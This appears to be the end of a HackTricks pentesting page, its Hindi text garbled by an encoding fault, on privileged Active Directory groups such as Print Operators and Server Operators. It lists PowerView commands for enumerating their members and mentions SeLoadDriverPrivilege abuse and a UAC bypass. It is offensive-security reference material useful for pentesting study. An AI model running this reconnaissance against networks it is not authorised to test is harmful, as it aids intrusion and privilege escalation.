рдкреНрд░рд┐рдВрдЯ рдСрдкрд░реЗрдЯрд░ рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдпреЛрдВ рдХреЛ рдХрдИ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рд╣реЛрддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдореЗрдВ SeLoadDriverPrivilege рд╢рд╛рдорд┐рд▓ рд╣реИ, рдЬреЛ рдЙрдиреНрд╣реЗрдВ рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ рдкрд░ рд╕реНрдерд╛рдиреАрдп рд░реВрдк рд╕реЗ рд▓реЙрдЧ рдСрди рдХрд░рдиреЗ, рдЙрд╕реЗ рдмрдВрдж рдХрд░рдиреЗ рдФрд░ рдкреНрд░рд┐рдВрдЯрд░ рдкреНрд░рдмрдВрдзрд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рдЗрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рд╢реЛрд╖рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдпрджрд┐ SeLoadDriverPrivilege рдПрдХ рдЕрд╡реНрдпрд╡рд╕реНрдерд┐рдд рд╕рдВрджрд░реНрдн рдХреЗ рддрд╣рдд рджрд┐рдЦрд╛рдИ рдирд╣реАрдВ рджреЗрддрд╛ рд╣реИ, рддреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддрд╛ рдирд┐рдпрдВрддреНрд░рдг (UAC) рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИред

рдЗрд╕ рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдпреЛрдВ рдХреА рд╕реВрдЪреА рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд PowerShell рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ:

Get-NetGroupMember -Identity "Print Operators" -Recurse

For more detailed exploitation techniques related to SeLoadDriverPrivilege, one should consult specific security resources.

Remote Desktop Users

рдЗрд╕ рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдпреЛрдВ рдХреЛ рд░рд┐рдореЛрдЯ рдбреЗрд╕реНрдХрдЯреЙрдк рдкреНрд░реЛрдЯреЛрдХреЙрд▓ (RDP) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ PCs рддрдХ рдкрд╣реБрдВрдЪ рджреА рдЬрд╛рддреА рд╣реИред рдЗрди рд╕рджрд╕реНрдпреЛрдВ рдХреА рдЧрдгрдирд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, PowerShell рдХрдорд╛рдВрдб рдЙрдкрд▓рдмреНрдз рд╣реИрдВ:

Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users"

рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА RDP рдХрд╛ рд╢реЛрд╖рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕рдорд░реНрдкрд┐рдд pentesting рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдореЗрдВ рдкрд╛рдИ рдЬрд╛ рд╕рдХрддреА рд╣реИред

рд░рд┐рдореЛрдЯ рдкреНрд░рдмрдВрдзрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛

рд╕рджрд╕реНрдп Windows Remote Management (WinRM) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ PCs рддрдХ рдкрд╣реБрдБрдЪ рд╕рдХрддреЗ рд╣реИрдВред рдЗрди рд╕рджрд╕реНрдпреЛрдВ рдХреА рдЧрдгрдирд╛ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХреА рдЬрд╛рддреА рд╣реИ:

Get-NetGroupMember -Identity "Remote Management Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Users"

For exploitation techniques related to WinRM, specific documentation should be consulted.

Server Operators

рдпрд╣ рд╕рдореВрд╣ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХреЛрдВ рдкрд░ рд╡рд┐рднрд┐рдиреНрди рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЕрдиреБрдорддрд┐рдпрд╛рдБ рд░рдЦрддрд╛ рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдмреИрдХрдЕрдк рдФрд░ рдкреБрдирд░реНрд╕реНрдерд╛рдкрдирд╛ рдЕрдзрд┐рдХрд╛рд░, рд╕рд┐рд╕реНрдЯрдо рд╕рдордп рдмрджрд▓рдирд╛, рдФрд░ рд╕рд┐рд╕реНрдЯрдо рдХреЛ рдмрдВрдж рдХрд░рдирд╛ рд╢рд╛рдорд┐рд▓ рд╣реИред рд╕рджрд╕реНрдпреЛрдВ рдХреА рдЧрдгрдирд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдкреНрд░рджрд╛рди рдХрд┐рдпрд╛ рдЧрдпрд╛ рдЖрджреЗрд╢ рд╣реИ:

Get-NetGroupMember -Identity "Server Operators" -Recurse

References

HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ

Last updated